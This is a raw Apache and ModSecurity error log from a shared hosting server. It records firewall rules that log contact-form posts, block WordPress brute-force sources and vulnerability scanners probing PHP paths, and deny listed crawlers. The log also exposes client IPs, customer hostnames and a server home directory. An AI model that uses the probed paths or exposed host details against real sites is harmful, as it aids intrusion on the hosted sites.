[Tue May 26 14:25:03.459173 2026] [security2:error] [pid 606909:tid 607053] [client 14.143.222.113:49464] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf510yRtX9qA7aVUVjbAAAAJM"]
[Tue May 26 14:25:03.547348 2026] [security2:error] [pid 606909:tid 607053] [client 14.143.222.113:49464] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf510yRtX9qA7aVUVjbAAAAJM"]
[Tue May 26 14:25:04.467148 2026] [security2:error] [pid 610693:tid 610859] [client 60.53.115.107:39038] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVf6DvNO3hpmlY6M8RbCAAAJCM"]
[Tue May 26 14:25:04.878122 2026] [security2:error] [pid 606909:tid 607134] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf6F0yRtX9qA7aVUVjfgAAAOQ"]
[Tue May 26 14:25:04.993260 2026] [security2:error] [pid 610693:tid 610899] [client 14.143.222.113:49940] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf6DvNO3hpmlY6M8RbEAAAAEw"]
[Tue May 26 14:25:05.073700 2026] [security2:error] [pid 610693:tid 610899] [client 14.143.222.113:49940] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf6DvNO3hpmlY6M8RbEAAAAEw"]
[Tue May 26 14:25:05.652543 2026] [security2:error] [pid 606909:tid 607098] [client 202.141.83.254:19719] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVf6V0yRtX9qA7aVUVjjAAAAMA"]
[Tue May 26 14:25:05.652688 2026] [security2:error] [pid 606909:tid 607098] [client 202.141.83.254:19719] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVf6V0yRtX9qA7aVUVjjAAAAMA"]
[Tue May 26 14:25:05.772423 2026] [security2:error] [pid 606909:tid 606974] [remote 14.225.71.169:44206] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 169.71.225.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVf6V0yRtX9qA7aVUVjigAAvEA"]
[Tue May 26 14:25:05.796370 2026] [security2:error] [pid 610693:tid 610885] [client 146.174.177.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf6TvNO3hpmlY6M8RbFAAAAD4"]
[Tue May 26 14:25:06.087445 2026] [security2:error] [pid 610693:tid 610731] [remote 213.171.208.232:59542] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVf6TvNO3hpmlY6M8RbGAAAMSU"]
[Tue May 26 14:25:06.493581 2026] [security2:error] [pid 610693:tid 610936] [client 14.143.222.113:50634] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf6jvNO3hpmlY6M8RbGwAAAHE"]
[Tue May 26 14:25:06.584994 2026] [security2:error] [pid 610693:tid 610936] [client 14.143.222.113:50634] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf6jvNO3hpmlY6M8RbGwAAAHE"]
[Tue May 26 14:25:07.705846 2026] [security2:error] [pid 606909:tid 607160] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf610yRtX9qA7aVUVjnAAAAP4"]
[Tue May 26 14:25:07.985714 2026] [security2:error] [pid 606909:tid 607154] [client 14.143.222.113:51112] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf610yRtX9qA7aVUVjrQAAAPg"]
[Tue May 26 14:25:08.069401 2026] [security2:error] [pid 606909:tid 607154] [client 14.143.222.113:51112] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf610yRtX9qA7aVUVjrQAAAPg"]
[Tue May 26 14:25:08.385206 2026] [security2:error] [pid 610693:tid 610735] [remote 95.216.117.13:60338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVf7DvNO3hpmlY6M8RbOQAAfCk"]
[Tue May 26 14:25:09.471059 2026] [security2:error] [pid 610693:tid 610945] [client 14.143.222.113:51858] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf7TvNO3hpmlY6M8RbSQAAAHo"]
[Tue May 26 14:25:09.557368 2026] [security2:error] [pid 610693:tid 610945] [client 14.143.222.113:51858] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "429"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf7TvNO3hpmlY6M8RbSQAAAHo"]
[Tue May 26 14:25:09.795979 2026] [security2:error] [pid 606909:tid 607128] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf7V0yRtX9qA7aVUVjwQAAAN4"]
[Tue May 26 14:25:10.970291 2026] [security2:error] [pid 610693:tid 610837] [client 14.143.222.113:52338] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf7jvNO3hpmlY6M8RbXAAAAA4"]
[Tue May 26 14:25:11.784772 2026] [security2:error] [pid 606909:tid 607115] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf710yRtX9qA7aVUVj7gAAANE"]
[Tue May 26 14:25:12.132119 2026] [security2:error] [pid 610693:tid 610837] [client 14.143.222.113:52338] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf7jvNO3hpmlY6M8RbXAAAAA4"]
[Tue May 26 14:25:12.132171 2026] [security2:error] [pid 610693:tid 610837] [client 14.143.222.113:52338] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "thedebateafrica.org"] [uri "/wp-comments-post.php"] [unique_id "ahVf7jvNO3hpmlY6M8RbXAAAAA4"]
[Tue May 26 14:25:14.031394 2026] [security2:error] [pid 610693:tid 610922] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf8TvNO3hpmlY6M8RbjAAAAGM"]
[Tue May 26 14:25:15.832847 2026] [security2:error] [pid 610693:tid 610900] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf8zvNO3hpmlY6M8RbtAAAAE0"]
[Tue May 26 14:25:16.174690 2026] [security2:error] [pid 606909:tid 607158] [client 202.141.83.254:53810] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVf9F0yRtX9qA7aVUVkNgAAAPw"]
[Tue May 26 14:25:16.174802 2026] [security2:error] [pid 606909:tid 607158] [client 202.141.83.254:53810] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVf9F0yRtX9qA7aVUVkNgAAAPw"]
[Tue May 26 14:25:17.066665 2026] [security2:error] [pid 610693:tid 610933] [client 47.128.30.208:38486] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.omshriinfrastructures.com"] [uri "/robots.txt"] [unique_id "ahVf9TvNO3hpmlY6M8Rb0AAAAG4"]
[Tue May 26 14:25:17.400735 2026] [security2:error] [pid 606909:tid 607128] [client 114.119.156.165:43143] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVf9V0yRtX9qA7aVUVkSwAAAN4"], referer: https://glorodavionics.com/
[Tue May 26 14:25:17.467364 2026] [security2:error] [pid 610693:tid 610898] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf9DvNO3hpmlY6M8RbzwAAAEs"]
[Tue May 26 14:25:20.396829 2026] [security2:error] [pid 610693:tid 610839] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf9zvNO3hpmlY6M8RcFgAAABA"]
[Tue May 26 14:25:22.072221 2026] [security2:error] [pid 606909:tid 607077] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf-V0yRtX9qA7aVUVkjAAAAKs"]
[Tue May 26 14:25:23.019898 2026] [security2:error] [pid 606909:tid 607014] [remote 185.190.18.72:34578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.18.190.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVf-l0yRtX9qA7aVUVkpwAAumg"]
[Tue May 26 14:25:24.158827 2026] [security2:error] [pid 610693:tid 610859] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf-zvNO3hpmlY6M8RcPQAAACQ"]
[Tue May 26 14:25:24.900195 2026] [security2:error] [pid 606909:tid 607120] [client 4.201.75.230:28225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "trichycityag.svijaykumar.in"] [uri "/wk/index.php"] [unique_id "ahVf_F0yRtX9qA7aVUVk1gAAANY"]
[Tue May 26 14:25:25.450566 2026] [security2:error] [pid 610693:tid 610940] [client 95.108.213.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahVf_DvNO3hpmlY6M8RcSgAAAHU"]
[Tue May 26 14:25:25.450682 2026] [security2:error] [pid 610693:tid 610857] [client 95.108.213.250:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahVf-zvNO3hpmlY6M8RcOwAAACI"]
[Tue May 26 14:25:25.795205 2026] [security2:error] [pid 610693:tid 610881] [client 95.108.213.148:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahVf_TvNO3hpmlY6M8RcXgAAADo"]
[Tue May 26 14:25:26.124221 2026] [security2:error] [pid 610693:tid 610840] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf_TvNO3hpmlY6M8RcXQAAABE"]
[Tue May 26 14:25:26.751860 2026] [security2:error] [pid 610693:tid 610825] [client 202.141.83.254:53784] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVf_jvNO3hpmlY6M8RccAAAAAI"]
[Tue May 26 14:25:26.752037 2026] [security2:error] [pid 610693:tid 610825] [client 202.141.83.254:53784] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVf_jvNO3hpmlY6M8RccAAAAAI"]
[Tue May 26 14:25:26.788670 2026] [security2:error] [pid 610693:tid 610873] [client 87.250.224.122:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahVf_jvNO3hpmlY6M8RcdAAAADI"]
[Tue May 26 14:25:27.344933 2026] [security2:error] [pid 606909:tid 607099] [client 4.201.75.230:28230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "trichycityag.svijaykumar.in"] [uri "/inputs.php"] [unique_id "ahVf_10yRtX9qA7aVUVk_AAAAME"]
[Tue May 26 14:25:27.812746 2026] [security2:error] [pid 606909:tid 607164] [client 95.108.213.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahVf_10yRtX9qA7aVUVlBAAAAQI"]
[Tue May 26 14:25:27.924851 2026] [core:crit] [pid 606909:tid 607061] (13)Permission denied: [client 52.167.144.166:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:25:28.213526 2026] [security2:error] [pid 606909:tid 607143] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVf_10yRtX9qA7aVUVlBgAAAO0"]
[Tue May 26 14:25:28.862030 2026] [security2:error] [pid 606909:tid 607098] [client 74.7.241.172:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "jkjuice.taotechservices.com"] [uri "/index.php"] [unique_id "ahVgAF0yRtX9qA7aVUVlEwAAAMA"]
[Tue May 26 14:25:28.862801 2026] [security2:error] [pid 610693:tid 610927] [client 74.7.241.172:52586] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "jkjuice.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahVgADvNO3hpmlY6M8RckwAAaFA"]
[Tue May 26 14:25:28.931953 2026] [security2:error] [pid 606909:tid 607050] [client 74.7.244.59:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "jkjuice.com"] [uri "/index.php"] [unique_id "ahVgAF0yRtX9qA7aVUVlEQAAAJA"]
[Tue May 26 14:25:28.954147 2026] [security2:error] [pid 610693:tid 610902] [client 74.7.244.59:49212] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "jkjuice.com"] [uri "/robots.txt"] [unique_id "ahVgADvNO3hpmlY6M8RckAAAT1M"]
[Tue May 26 14:25:29.782691 2026] [security2:error] [pid 606909:tid 607095] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgAV0yRtX9qA7aVUVlIgAAAL0"]
[Tue May 26 14:25:31.002657 2026] [security2:error] [pid 606909:tid 607081] [client 4.201.75.230:28224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "trichycityag.svijaykumar.in"] [uri "/ioxi-o.php"] [unique_id "ahVgA10yRtX9qA7aVUVlNwAAAK8"]
[Tue May 26 14:25:31.929047 2026] [security2:error] [pid 606909:tid 607067] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgA10yRtX9qA7aVUVlOgAAAKE"]
[Tue May 26 14:25:33.445123 2026] [security2:error] [pid 610693:tid 610938] [client 113.178.29.123:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgBTvNO3hpmlY6M8RdBAAAAHM"]
[Tue May 26 14:25:34.122738 2026] [security2:error] [pid 606909:tid 607120] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgBV0yRtX9qA7aVUVlTwAAANY"]
[Tue May 26 14:25:35.030407 2026] [ssl:error] [pid 610693:tid 610843] [client 54.86.115.253:12518] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname webmail.rbkgroups.co.in provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:25:36.436248 2026] [security2:error] [pid 610693:tid 610834] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgBzvNO3hpmlY6M8RdMgAAAAs"]
[Tue May 26 14:25:37.199817 2026] [security2:error] [pid 606909:tid 607146] [client 202.141.83.254:53933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgCV0yRtX9qA7aVUVlbQAAAPA"]
[Tue May 26 14:25:37.200007 2026] [security2:error] [pid 606909:tid 607146] [client 202.141.83.254:53933] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgCV0yRtX9qA7aVUVlbQAAAPA"]
[Tue May 26 14:25:37.494566 2026] [security2:error] [pid 610693:tid 610904] [client 189.203.96.184:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "avprealty.com"] [uri "/index.php"] [unique_id "ahVgCDvNO3hpmlY6M8RdOAAAAFE"]
[Tue May 26 14:25:37.649835 2026] [security2:error] [pid 610693:tid 610795] [remote 74.7.241.58:34142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVgCTvNO3hpmlY6M8RdUgAAU2U"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/sv
[Tue May 26 14:25:38.557742 2026] [security2:error] [pid 610693:tid 610940] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgCjvNO3hpmlY6M8RdWQAAAHU"]
[Tue May 26 14:25:39.064341 2026] [security2:error] [pid 610693:tid 610902] [client 4.201.75.230:28229] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "trichycityag.svijaykumar.in"] [uri "/function/function.php"] [unique_id "ahVgCzvNO3hpmlY6M8RdZwAAAE8"]
[Tue May 26 14:25:40.803412 2026] [security2:error] [pid 610693:tid 610934] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgDDvNO3hpmlY6M8RddQAAAG8"]
